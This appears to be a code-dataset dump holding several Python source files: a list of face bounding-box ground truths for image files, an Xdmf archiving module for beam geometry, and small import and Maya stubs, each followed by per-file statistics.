4,475,244],['voyager2.jpg',150,277,204,337],['voyager2.jpg',336,314,390,368],['voyager2.jpg',518,300,568,358],['plays.jpg',28,566,120,674],['plays.jpg',327,89,359,121],['plays.jpg',402,111,428,137],['plays.jpg',485,87,511,117],['lacrosse.jpg',88,39,124,75],['hendrix2.jpg',37,56,87,110],['judybats.jpg',36,387,90,441],['judybats.jpg',122,222,266,394],['judybats.jpg',371,407,399,431],['judybats.jpg',428,328,496,408],['judybats.jpg',628,433,670,479],['mom-baby.jpg',53,43,121,111],['mom-baby.jpg',124,163,182,221],['kaari-stef.jpg',57,84,159,186],['kaari-stef.jpg',287,92,367,174],['kaari1.jpg',70,120,182,240],['kaari2.jpg',111,40,179,122],['shumeet.jpg',178,92,226,142],['aerosmith-double.jpg',86,129,126,171],['aerosmith-double.jpg',107,23,141,63],['aerosmith-double.jpg',160,99,194,143],['aerosmith-double.jpg',229,46,261,86],['aerosmith-double.jpg',275,117,311,161],['pace-university-double.jpg',13,97,47,139],['pace-university-double.jpg',155,85,195,129],['pace-university-double.jpg',240,123,280,161],['pace-university-double.jpg',356,90,398,128],['pace-university-double.jpg',456,97,498,141],['pace-unive
rsity-double.jpg',572,105,610,141],['pace-university-double.jpg',690,93,732,139],['pace-university-double.jpg',780,110,818,154],['hendrix1-bigger.jpg',123,68,165,120],['hendrix1-bigger.jpg',67,365,89,391],['hendrix1-bigger.jpg',124,360,154,396],['hendrix1-bigger.jpg',169,369,187,393],['hendrix1-bigger.jpg',52,632,76,662],['hendrix1-bigger.jpg',120,618,148,652],['hendrix1-bigger.jpg',169,621,189,649],['hendrix1-bigger.jpg',329,109,353,135],['hendrix1-bigger.jpg',386,76,406,100],['hendrix1-bigger.jpg',454,87,484,119],['hendrix1-bigger.jpg',323,375,347,405],['hendrix1-bigger.jpg',384,345,404,369],['hendrix1-bigger.jpg',453,351,479,387],['hendrix1-bigger.jpg',330,641,362,675],['hendrix1-bigger.jpg',382,623,402,649],['hendrix1-bigger.jpg',457,613,481,647],['hendrix1-bigger.jpg',589,110,619,140],['hendrix1-bigger.jpg',643,93,667,117],['hendrix1-bigger.jpg',714,83,738,117],['hendrix1-bigger.jpg',580,365,612,403],['hendrix1-bigger.jpg',645,351,681,385],['hendrix1-bigger.jpg',698,365,730,393],['hendrix1-bigger.jpg',582,627,610,659],['hendrix1-bigger.jpg',644,609,676,645],['hendrix1-bigger.jpg',706,620,730,650],['blues-double.jpg',102,33,134,75],['blues-double.jpg',178,75,208,109],['blues-double.jpg',265,54,297,86],['blues-double.jpg',354,33,386,71],['music-groups-double.jpg',26,137,60,175],['music-groups-double.jpg',75,111,107,149],['music-groups-double.jpg',135,83,167,121],['music-groups-double.jpg',250,88,284,118],['music-groups-double.jpg',328,241,376,295],['music-groups-double.jpg',462,202,506,254],['music-groups-double.jpg',423,311,473,371],['music-groups-double.jpg',561,236,605,290],['henry.jpg',96,110,388,334],['henry.jpg',438,60,544,154],['henry.jpg',462,221,530,305],['henry.jpg',349,368,439,456],['Arsenal.jpg',72,53,96,79],['Arsenal.jpg',56,97,78,127],['Arsenal.jpg',131,40,157,74],['Arsenal.jpg',191,58,211,88],['Arsenal.jpg',229,81,255,115],['Arsenal.jpg',276,65,300,97],['Arsenal.jpg',313,33,341,69],['Arsenal.jpg',372,31,396,63],['Arsenal.jpg',439,17,463,49],['Arsen
al.jpg',169,178,199,216],['Arsenal.jpg',245,173,273,205],['Arsenal.jpg',356,154,382,180],['Arsenal.jpg',455,164,483,196],['Arsenal.jpg',535,181,563,215],['Arsenal.jpg',601,183,619,217],['Arsenal.jpg',557,50,577,80],['Argentina.jpg',37,55,65,87],['Argentina.jpg',131,50,161,78],['Argentina.jpg',233,50,261,78],['Argentina.jpg',337,38,363,66],['Argentina.jpg',437,59,463,85],['Argentina.jpg',528,45,552,77],['Argentina.jpg',50,206,76,238],['Argentina.jpg',152,204,182,234],['Argentina.jpg',287,215,313,247],['Argentina.jpg',407,202,433,236],['Argentina.jpg',541,201,569,231],['Brazil.jpg',25,64,49,92],['Brazil.jpg',113,66,133,96],['Brazil.jpg',209,43,233,71],['Brazil.jpg',329,41,351,67],['Brazil.jpg',449,51,469,75],['Brazil.jpg',533,63,561,91],['Brazil.jpg',87,167,111,199],['Brazil.jpg',209,186,235,220],['Brazil.jpg',339,179,361,209],['Brazil.jpg',471,190,493,218],['Brazil.jpg',591,192,619,222],['USA.jpg',52,77,76,105],['USA.jpg',165,87,185,115],['USA.jpg',273,89,293,121],['USA.jpg',380,92,400,118],['USA.jpg',471,78,491,106],['USA.jpg',556,75,576,103],['USA.jpg',34,256,58,282],['USA.jpg',143,251,165,275],['USA.jpg',262,233,284,261],['USA.jpg',399,235,423,263],['USA.jpg',511,235,533,261],['USA.jpg',62,354,96,408],['USA.jpg',122,360,162,400],['USA.jpg',189,365,235,409],['Colombia.jpg',46,77,68,103],['Colombia.jpg',154,62,180,90],['Colombia.jpg',266,50,290,74],['Colombia.jpg',385,56,409,82],['Colombia.jpg',503,71,527,97],['Colombia.jpg',586,67,612,97],['Colombia.jpg',113,220,139,250],['Colombia.jpg',226,208,254,240],['Colombia.jpg',335,173,361,203],['Colombia.jpg',449,218,477,250],['Colombia.jpg',555,214,581,246],['Ecuador.jpg',80,79,102,103],['Ecuador.jpg',177,80,197,106],['Ecuador.jpg',279,75,303,101],['Ecuador.jpg',375,77,399,101],['Ecuador.jpg',459,80,479,108],['Ecuador.jpg',540,87,562,113],['Ecuador.jpg',4,181,28,213],['Ecuador.jpg',108,207,136,237],['Ecuador.jpg',207,220,239,252],['Ecuador.jpg',326,210,354,246],['Ecuador.jpg',458,207,482,237],['Ecuador.jpg',581,231,601,26
1],['me.jpg',140,34,164,66],['England.jpg',22,57,44,81],['England.jpg',109,74,137,102],['England.jpg',210,68,234,98],['England.jpg',312,53,338,83],['England.jpg',424,42,448,72],['England.jpg',541,72,565,98],['England.jpg',28,227,52,257],['England.jpg',150,242,176,272],['England.jpg',257,241,283,273],['England.jpg',403,245,435,279],['England.jpg',539,248,567,278],['tp.jpg',27,49,71,99],['Germany.jpg',24,61,50,91],['Germany.jpg',126,79,150,109],['Germany.jpg',237,55,265,81],['Germany.jpg',362,67,384,91],['Germany.jpg',462,73,486,99],['Germany.jpg',572,82,600,112],['Germany.jpg',31,232,55,264],['Germany.jpg',156,229,180,265],['Germany.jpg',303,229,331,261],['Germany.jpg',447,245,477,277],['Germany.jpg',589,238,615,270],['albert.jpg',64,23,98,61],['board.jpg',196,168,222,200],['board.jpg',218,259,250,295],['board.jpg',236,327,268,365],['board.jpg',309,188,341,232],['board.jpg',306,260,330,296],['board.jpg',311,319,345,363],['board.jpg',378,192,410,230],['board.jpg',377,260,411,304],['board.jpg',379,319,411,353],['brian.jpg',49,32,81,66],['cards-perp-sml.jpg',68,154,92,178],['cards-perp-sml.jpg',157,152,177,176],['cards-perp-sml.jpg',235,152,255,174],['cards-perp-sml.jpg',102,81,122,105],['cards-perp-sml.jpg',207,89,227,111],['cards-perp-sml.jpg',73,30,93,54],['cards-perp-sml.jpg',146,29,166,49],['cards-perp-sml.jpg',229,27,251,47],['frisbee.jpg',56,70,82,98],['frisbee.jpg',99,93,131,125],['frisbee.jpg',185,94,213,126],['frisbee.jpg',222,95,252,129],['frisbee.jpg',142,33,174,63],['kymberly.jpg',41,33,85,79],['oksana1.jpg',108,68,134,98],['oksana1.jpg',164,76,184,98],['oksana1.jpg',197,62,217,92],['soccer.jpg',20,66,40,90],['soccer.jpg',63,65,83,89],['soccer.jpg',115,64,139,90],['soccer.jpg',180,70,204,96],['soccer.jpg',259,54,283,78],['soccer.jpg',339,72,365,96],['soccer.jpg',422,61,442,85],['soccer.jpg',506,72,530,96],['soccer.jpg',595,56,621,88],['soccer.jpg',109,208,135,236],['soccer.jpg',184,224,208,246],['soccer.jpg',260,214,286,240],['soccer.jpg',362,236,388,270],[
'soccer.jpg',449,235,469,265],['soccer.jpg',530,214,554,244],['tommyrw.jpg',92,75,124,107],['torrance.jpg',136,72,170,114],['torrance.jpg',197,87,227,113],['trek-trio.jpg',23,126,45,150],['trek-trio.jpg',111,54,151,96],['trek-trio.jpg',222,123,248,149],['trekcolr.jpg',34,33,72,77],['trekcolr.jpg',81,23,119,67],['trekcolr.jpg',128,23,156,51],['tp-reza-girosi.jpg',26,45,52,77],['tp-reza-girosi.jpg',86,55,114,89],['tp-reza-girosi.jpg',150,30,180,62],['oksana1.jpg',131,67,151,91],['cards-perp-sml.jpg',68,254,88,278],['cards-perp-sml.jpg',143,261,163,283],['J-L_Picard.Baldy.jpg',179,71,205,121],['addams-family.jpg',85,514,121,554],['addams-family.jpg',142,412,186,458],['addams-family.jpg',333,185,373,225],['addams-family.jpg',428,158,460,198],['addams-family.jpg',718,92,760,144],['addams-family.jpg',663,395,701,433],['addams-family.jpg',740,562,784,600],['aeon1a.jpg',174,115,288,225],['audrey1.jpg',135,112,217,202],['audrey2.jpg',64,159,198,303],['audrybt1.jpg',133,46,167,78],['bksomels.jpg',172,89,244,177],['bttf206.jpg',228,127,314,221],['bttf301.jpg',70,34,112,80],['bttf301.jpg',142,104,178,140],['bttf301.jpg',215,110,253,148],['bttf301.jpg',333,51,371,95],['bttf301.jpg',464,77,498,119],['bttf301.jpg',512,132,550,168],['bwolen.jpg',19,28,45,60],['cfb.jpg',58,55,120,117],['clapton.jpg',179,99,253,177],['class57.jpg',105,512,135,544],['class57.jpg',117,363,149,393],['class57.jpg',167,309,195,337],['class57.jpg',196,271,224,303],['class57.jpg',153,237,179,267],['class57.jpg',200,195,224,219],['class57.jpg',226,416,258,456],['class57.jpg',247,365,279,397],['class57.jpg',282,311,314,337],['class57.jpg',274,220,304,248],['class57.jpg',352,191,374,217],['class57.jpg',383,235,407,259],['class57.jpg',348,304,376,330],['class57.jpg',355,368,387,400],['class57.jpg',347,438,379,470],['class57.jpg',292,503,324,537],['class57.jpg',484,493,518,525],['class57.jpg',419,360,449,386],['class57.jpg',487,354,517,386],['class57.jpg',455,297,481,325],['class57.jpg',483,254,509,280],['class5
7.jpg',480,173,504,195],['class57.jpg',580,331,612,363],['class57.jpg',611,417,643,449],['class57.jpg',674,502,706,538],['class57.jpg',814,511,852,543],['class57.jpg',971,497,1005,531],['class57.jpg',1134,520,1168,552],['class57.jpg',1011,433,1045,465],['class57.jpg',1172,425,1200,457],['class57.jpg',1094,367,1126,397],['class57.jpg',972,383,1000,415],['class57.jpg',847,423,879,455],['class57.jpg',744,435,774,461],['class57.jpg',678,388,708,416],['class57.jpg',713,311,745,343],['class57.jpg',795,393,827,423],['class57.jpg',842,358,874,390],['class57.jpg',951,318,979,344],['class57.jpg',1061,327,1093,355],['class57.jpg',986,266,1010,296],['class57.jpg',1113,281,1141,313],['class57.jpg',1046,219,1076,243],['class57.jpg',795,282,825,310],['class57.jpg',830,264,854,286],['class57.jpg',881,252,905,280],['class57.jpg',945,226,971,246],['class57.jpg',1002,196,1028,224],['class57.jpg',883,194,905,214],['class57.jpg',827,192,855,218],['class57.jpg',735,248,763,274],['class57.jpg',652,278,678,310],['class57.jpg',576,264,604,294],['class57.jpg',539,221,563,247],['class57.jpg',600,179,624,207],['class57.jpg',634,232,658,258],['class57.jpg',709,173,735,203],['cpd.jpg',160,113,260,247],['crimson.jpg',206,359,408,625],['divinci-man1.jpg',281,194,313,226],['er.jpg',123,59,147,83],['er.jpg',71,136,99,160],['er.jpg',144,264,170,296],['er.jpg',261,238,289,264],['er.jpg',340,43,364,71],['er.jpg',406,93,428,131],['ew-courtney-david.jpg',83,65,127,115],['ew-courtney-david.jpg',129,54,183,116],['ew-friends.jpg',124,73,146,93],['ew-friends.jpg',157,59,177,81],['ew-friends.jpg',199,69,219,91],['ew-friends.jpg',127,120,149,146],['ew-friends.jpg',163,132,185,154],['ew-friends.jpg',209,119,231,143],['gigi.jpg',115,93,187,171],['gpripe.jpg',12,25,44,57],['gpripe.jpg',63,33,115,91],['herbie-hancock.jpg',269,363,371,473],['jackson.jpg',232,168,318,252],['john.coltrane.jpg',76,140,202,278],['karen-and-rob.jpg',89,204,129,244],['karen-and-rob.jpg',196,45,238,83],['larroquette.jpg',73,115,103,143],[
'larroquette.jpg',115,104,137,128],['larroquette.jpg',135,156,157,176],['larroquette.jpg',183,134,205,158],['larroquette.jpg',222,100,244,120],['larroquette.jpg',264,147,286,171],['larroquette.jpg',333,156,359,176],['larroquette.jpg',377,116,403,146],['larroquette.jpg',103,225,127,247],['lawoman.jpg',50,95,88,141],['lawoman.jpg',114,123,148,167],['lawoman.jpg',175,122,207,166],['lawoman.jpg',243,146,279,190],['life-cover.jpg',263,312,353,436],['life-dreams.jpg',898,340,916,360],['madaboutyou.jpg',202,273,244,323],['madaboutyou.jpg',396,281,434,325],['married.jpg',38,94,76,138],['married.jpg',169,44,207,88],['married.jpg',294,59,330,99],['mickymouse-self-p.jpg',418,263,448,291],['mickymouse-self-p.jpg',544,303,634,423],['mona-lisa.jpg',187,150,281,258],['natalie1.jpg',118,179,440,537],['nens.jpg',36,164,60,184],['nens.jpg',90,168,114,188],['nens.jpg',143,172,165,192],['nens.jpg',191,165,213,185],['nens.jpg',169,100,191,120],['nens.jpg',119,108,141,128],['nens.jpg',63,106,85,128],['nens.jpg',15,88,41,110],['nens.jpg',48,38,70,58],['nens.jpg',96,29,118,51],['nens.jpg',149,16,173,36],['nens.jpg',202,25,224,47],['nens.jpg',237,112,257,132],['nens.jpg',152,235,176,259],['newsradio.jpg',99,267,143,321],['newsradio.jpg',220,185,262,233],['newsradio.jpg',316,264,354,308],['newsradio.jpg',383,210,443,260],['newsradio.jpg',313,130,361,178],['newsradio.jpg',232,86,274,130],['newsradio.jpg',55,128,105,182],['newsradio.jpg',141,172,181,216],['our-cards.jpg',549,45,581,79],['our-cards.jpg',112,786,154,824],['patio.jpg',129,47,167,89],['police.jpg',143,231,199,297],['police.jpg',234,234,298,296],['police.jpg',345,221,405,287],['rehg-thanksgiving-1994.jpg',122,90,146,122],['rehg-thanksgiving-1994.jpg',164,162,192,192],['rehg-thanksgiving-1994.jpg',222,87,242,107],['rehg-thanksgiving-1994.jpg',298,123,320,147],['rehg-thanksgiving-1994.jpg',294,77,318,97],['rehg-thanksgiving-1994.jpg',354,90,376,112],['rehg-thanksgiving-1994.jpg',410,97,436,123],['sarah4.jpg',104,142,230,284],['sarah_
live_2.jpg',41,33,435,455],['seinfeld.jpg',102,50,128,80],['seinfeld.jpg',161,64,189,90],['seinfeld.jpg',238,61,266,83],['seinfeld.jpg',326,45,350,77],['speed.jpg',37,45,67,73],['tori-crucify.jpg',147,156,213,228],['tori-entweekly.jpg',184,124,310,282],['tori-live3.jpg',199,48,253,102],['tress-photo-2.jpg',152,136,170,152],['tress-photo.jpg',175,146,201,170],['u2-cover.jpg',187,208,285,274],['waynesworld2.jpg',128,92,162,132],['waynesworld2.jpg',256,68,292,100],['window.jpg',123,48,149,80],['window.jpg',212,48,244,78],['wxm.jpg',39,29,69,61],['ysato.jpg',73,73,123,135],['our-cards.jpg',550,249,582,285],['our-cards.jpg',69,956,103,998]]
return ValidationGroundTruthsList
| 5,566
| 16,644
| 0.683794
| 3,231
| 16,698
| 3.532962
| 0.238007
| 0.049934
| 0.037232
| 0.013141
| 0.016645
| 0
| 0
| 0
| 0
| 0
| 0
| 0.358119
| 0.000479
| 16,698
| 3
| 16,645
| 5,566
| 0.325824
| 0
| 0
| 0
| 0
| 0
| 0.379184
| 0.039404
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
e9da9176a0ade90bac5842d9014985314416f769
| 49
|
py
|
Python
|
lib/ctyEnge/EngineeringSkills/__init__.py
|
JoshOrndorff/snippets
|
ef06e03de09897014f88d89a84b597aabde7edaa
|
[
"Unlicense"
] | null | null | null |
lib/ctyEnge/EngineeringSkills/__init__.py
|
JoshOrndorff/snippets
|
ef06e03de09897014f88d89a84b597aabde7edaa
|
[
"Unlicense"
] | null | null | null |
lib/ctyEnge/EngineeringSkills/__init__.py
|
JoshOrndorff/snippets
|
ef06e03de09897014f88d89a84b597aabde7edaa
|
[
"Unlicense"
] | null | null | null |
from .EngineeringSkills import EngineeringSkills
| 24.5
| 48
| 0.897959
| 4
| 49
| 11
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.081633
| 49
| 1
| 49
| 49
| 0.977778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e9dcf49e925ed3e887eb0787961c752c8bab2716
| 6,254
|
py
|
Python
|
proteus/mprans/ArchiveBeams.py
|
acatwithacomputer/proteus
|
80dfad95da6ab4d18a88a035f55c26b03540a864
|
[
"MIT"
] | null | null | null |
proteus/mprans/ArchiveBeams.py
|
acatwithacomputer/proteus
|
80dfad95da6ab4d18a88a035f55c26b03540a864
|
[
"MIT"
] | 13
|
2018-02-08T23:22:59.000Z
|
2020-12-06T19:40:32.000Z
|
proteus/mprans/ArchiveBeams.py
|
acatwithacomputer/proteus
|
80dfad95da6ab4d18a88a035f55c26b03540a864
|
[
"MIT"
] | 1
|
2020-02-17T03:25:34.000Z
|
2020-02-17T03:25:34.000Z
|
from __future__ import print_function
from builtins import range
import numpy as np
def InitializeXdmf(filename="beam"):
    """Create a fresh Xdmf (.xmf) file containing an empty temporal grid collection.

    Parameters
    ----------
    filename : str
        Basename of the output file; ".xmf" is appended.
    """
    # Context manager ensures the handle is closed even if a write raises
    # (the original left the file open on failure).
    with open(filename + ".xmf", 'w') as f:
        f.write('<?xml version="1.0" ?>' + '\n'
                + '<!DOCTYPE Xdmf SYSTEM "Xdmf.dtd" []>' + '\n'
                + '<Xdmf Version="2.0" xmlns:xi="http://www.w3.org/2001/XInclude">' + '\n'
                + '\t<Domain> \n'
                + '\t\t<Grid CollectionType="Temporal" GridType="Collection" Name="Mesh Spatial_Domain"> \n'
                + '\t\t</Grid> \n'
                + '\t</Domain> \n'
                + '</Xdmf>')
def AddTimestep(Beam_x,
                Beam_y,
                Beam_z,
                nBeams,
                filename="beam",
                t=0.0):
    """Append one timestep grid to an existing Xdmf file created by InitializeXdmf.

    Parameters
    ----------
    Beam_x, Beam_y, Beam_z : sequence of numpy arrays
        Per-beam node coordinates, indexed [beam][node].
    nBeams : int
        Number of beams (written into the Topology dimensions).
    filename : str
        Basename of the .xmf file to amend.
    t : float
        Simulation time recorded for this grid.
    """
    with open(filename + ".xmf", 'r') as f:
        data_list = f.readlines()
    # Drop the three closing lines (</Grid>, </Domain>, </Xdmf>) so the new
    # timestep grid can be spliced in before re-closing the document.
    # (Also removed a leftover debug print of the whole file contents.)
    del data_list[-3:]
    with open(filename + ".xmf", 'w') as f:
        f.writelines(data_list)
        f.write('\t\t\t<Grid GridType="Uniform">\n'
                + '\t\t\t\t<Time Value="' + repr(t) + '" />\n'
                + '\t\t\t\t<Topology TopologyType="Polyline" Dimensions="' + repr(nBeams) + '">\n'
                + '\t\t\t\t\t<DataItem Dimensions="' + repr(nBeams) + ' ' + repr(Beam_x[0].size) + '" NumberType="Int" Precision="8" Format="XML">\n')
        # Sequential connectivity: nodes are numbered 0..N-1 in write order.
        count = 0
        for i in range(len(Beam_x)):
            for j in range(Beam_x[i].size):
                f.write(repr(count) + ' ')
                count += 1
        f.write('\n')
        f.write('\t\t\t\t\t</DataItem>\n'
                + '\t\t\t\t</Topology>\n'
                + '\t\t\t\t<Geometry GeometryType="XYZ">\n'
                + '\t\t\t\t\t<DataItem Dimensions="' + repr(len(Beam_x) * Beam_x[0].size) + ' 3" NumberType="Float" Precision="4" Format="XML">\n')
        for i in range(len(Beam_x)):
            for j in range(Beam_x[i].size):
                sp = repr(Beam_x[i][j]) + ' ' + repr(Beam_y[i][j]) + ' ' + repr(Beam_z[i][j]) + '\n'
                f.write(sp)
        f.write('\t\t\t\t\t</DataItem>\n'
                + '\t\t\t\t</Geometry>\n'
                + '\t\t\t</Grid>\n'
                + '\t\t</Grid>\n'
                + '\t</Domain>\n'
                + '</Xdmf>\n')
def Archive_parallel(Beam_x,
                     Beam_y,
                     Beam_z,
                     nBeams,
                     filename="beam",
                     tList=None):
    """Write a complete Xdmf file containing one Uniform grid per timestep.

    Parameters
    ----------
    Beam_x, Beam_y, Beam_z : nested sequences of numpy arrays
        Per-timestep, per-beam node coordinates, indexed [timestep][beam][node].
    nBeams : int
        Number of beams (written into each Topology dimensions).
    filename : str
        Basename of the .xmf file to create.
    tList : list of float, optional
        Simulation times, one per timestep. Defaults to [0.0].
    """
    # None-sentinel instead of a shared mutable default argument.
    if tList is None:
        tList = [0.0]
    with open(filename + ".xmf", 'w') as f:
        f.write('<?xml version="1.0" ?>' + '\n'
                + '<!DOCTYPE Xdmf SYSTEM "Xdmf.dtd" []>' + '\n'
                + '<Xdmf Version="2.0" xmlns:xi="http://www.w3.org/2001/XInclude">' + '\n'
                + '\t<Domain> \n'
                + '\t\t<Grid CollectionType="Temporal" GridType="Collection" Name="Mesh Spatial_Domain"> \n')
        for k in range(len(tList)):
            f.write('\t\t\t<Grid GridType="Uniform">\n'
                    + '\t\t\t\t<Time Value="' + repr(tList[k]) + '" />\n'
                    + '\t\t\t\t<Topology TopologyType="Polyline" Dimensions="' + repr(nBeams) + '">\n'
                    + '\t\t\t\t\t<DataItem Dimensions="' + repr(nBeams) + ' ' + repr(Beam_x[k][0].size) + '" NumberType="Int" Precision="8" Format="XML">\n')
            # Sequential connectivity: nodes are numbered 0..N-1 in write order.
            count = 0
            for i in range(len(Beam_x[k])):
                for j in range(Beam_x[k][i].size):
                    f.write(repr(count) + ' ')
                    count += 1
            f.write('\n')
            # BUG FIX: the original re-emitted the full XML document header
            # (<?xml ...>, DOCTYPE, <Xdmf>, <Domain>, collection <Grid>) here
            # inside the per-timestep loop, producing malformed Xdmf. Only the
            # closing tags belong here (matching AddTimestep/Archive_time_step).
            f.write('\t\t\t\t\t</DataItem>\n'
                    + '\t\t\t\t</Topology>\n'
                    + '\t\t\t\t<Geometry GeometryType="XYZ">\n'
                    + '\t\t\t\t\t<DataItem Dimensions="' + repr(len(Beam_x[k]) * Beam_x[k][0].size) + ' 3" NumberType="Float" Precision="4" Format="XML">\n')
            for i in range(len(Beam_x[k])):
                for j in range(Beam_x[k][i].size):
                    sp = repr(Beam_x[k][i][j]) + ' ' + repr(Beam_y[k][i][j]) + ' ' + repr(Beam_z[k][i][j]) + '\n'
                    f.write(sp)
            f.write('\t\t\t\t\t</DataItem>\n'
                    + '\t\t\t\t</Geometry>\n'
                    + '\t\t\t</Grid>\n')
        f.write('\t\t</Grid>\n'
                + '\t</Domain>\n'
                + '</Xdmf>\n')
def Archive_time_step(Beam_x,
                      Beam_y,
                      Beam_z,
                      nBeams,
                      filename="beam",
                      t=0.0,
                      tStep=0):
    """Write a single-timestep Xdmf file named "<filename><tStep>.xmf".

    Parameters
    ----------
    Beam_x, Beam_y, Beam_z : sequence of numpy arrays
        Per-beam node coordinates, indexed [beam][node].
    nBeams : int
        Number of beams (written into the Topology dimensions).
    filename : str
        Basename; the integer tStep is appended before the ".xmf" suffix.
    t : float
        Simulation time recorded for this grid.
    tStep : int
        Timestep index used to distinguish output files.
    """
    # Context manager replaces the bare open/close pair; removed a line of
    # commented-out dead code from the original.
    with open(filename + repr(tStep) + ".xmf", 'w') as f:
        f.write('<?xml version="1.0" ?>' + '\n'
                + '<!DOCTYPE Xdmf SYSTEM "Xdmf.dtd" []>' + '\n'
                + '<Xdmf Version="2.0" xmlns:xi="http://www.w3.org/2001/XInclude">' + '\n'
                + '\t<Domain> \n'
                + '\t\t<Grid CollectionType="Temporal" GridType="Collection" Name="Mesh Spatial_Domain"> \n'
                + '\t\t\t<Grid GridType="Uniform">\n'
                + '\t\t\t\t<Time Value="' + repr(t) + '" />\n'
                + '\t\t\t\t<Topology TopologyType="Polyline" Dimensions="' + repr(nBeams) + '">\n'
                + '\t\t\t\t\t<DataItem Dimensions="' + repr(nBeams) + ' ' + repr(Beam_x[0].size) + '" NumberType="Int" Precision="8" Format="XML">\n')
        # Sequential connectivity: nodes are numbered 0..N-1 in write order.
        count = 0
        for i in range(len(Beam_x)):
            for j in range(Beam_x[i].size):
                f.write(repr(count) + ' ')
                count += 1
        f.write('\n')
        f.write('\t\t\t\t\t</DataItem>\n'
                + '\t\t\t\t</Topology>\n'
                + '\t\t\t\t<Geometry GeometryType="XYZ">\n'
                + '\t\t\t\t\t<DataItem Dimensions="' + repr(len(Beam_x) * Beam_x[0].size) + ' 3" NumberType="Float" Precision="4" Format="XML">\n')
        for i in range(len(Beam_x)):
            for j in range(Beam_x[i].size):
                sp = repr(Beam_x[i][j]) + ' ' + repr(Beam_y[i][j]) + ' ' + repr(Beam_z[i][j]) + '\n'
                f.write(sp)
        f.write('\t\t\t\t\t</DataItem>\n'
                + '\t\t\t\t</Geometry>\n'
                + '\t\t\t</Grid>\n'
                + '\t\t</Grid>\n'
                + '\t</Domain>\n'
                + '</Xdmf>\n')
| 41.417219
| 152
| 0.461145
| 873
| 6,254
| 3.237113
| 0.106529
| 0.079972
| 0.076433
| 0.055202
| 0.918613
| 0.90552
| 0.890658
| 0.890658
| 0.861642
| 0.843949
| 0
| 0.015629
| 0.314519
| 6,254
| 150
| 153
| 41.693333
| 0.643574
| 0.003678
| 0
| 0.8
| 0
| 0.059259
| 0.383529
| 0.103227
| 0.059259
| 0
| 0
| 0
| 0
| 1
| 0.02963
| false
| 0
| 0.022222
| 0
| 0.051852
| 0.014815
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
75e2abb6e9c54e3b9b6d2f1fc97fc5f39d8bf899
| 84
|
py
|
Python
|
win/devkit/other/pymel/extras/completion/py/maya/app/general/pointOnPolyConstraint.py
|
leegoonz/Maya-devkit
|
b81fe799b58e854e4ef16435426d60446e975871
|
[
"ADSL"
] | 10
|
2018-03-30T16:09:02.000Z
|
2021-12-07T07:29:19.000Z
|
win/devkit/other/pymel/extras/completion/py/maya/app/general/pointOnPolyConstraint.py
|
leegoonz/Maya-devkit
|
b81fe799b58e854e4ef16435426d60446e975871
|
[
"ADSL"
] | null | null | null |
win/devkit/other/pymel/extras/completion/py/maya/app/general/pointOnPolyConstraint.py
|
leegoonz/Maya-devkit
|
b81fe799b58e854e4ef16435426d60446e975871
|
[
"ADSL"
] | 9
|
2018-06-02T09:18:49.000Z
|
2021-12-20T09:24:35.000Z
|
import maya.cmds as cmds
import maya.OpenMaya as om
def assembleCmd():
    """No-op placeholder; the body is empty and the function returns None."""
| 9.333333
| 26
| 0.714286
| 13
| 84
| 4.615385
| 0.692308
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.22619
| 84
| 8
| 27
| 10.5
| 0.923077
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0.25
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 8
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.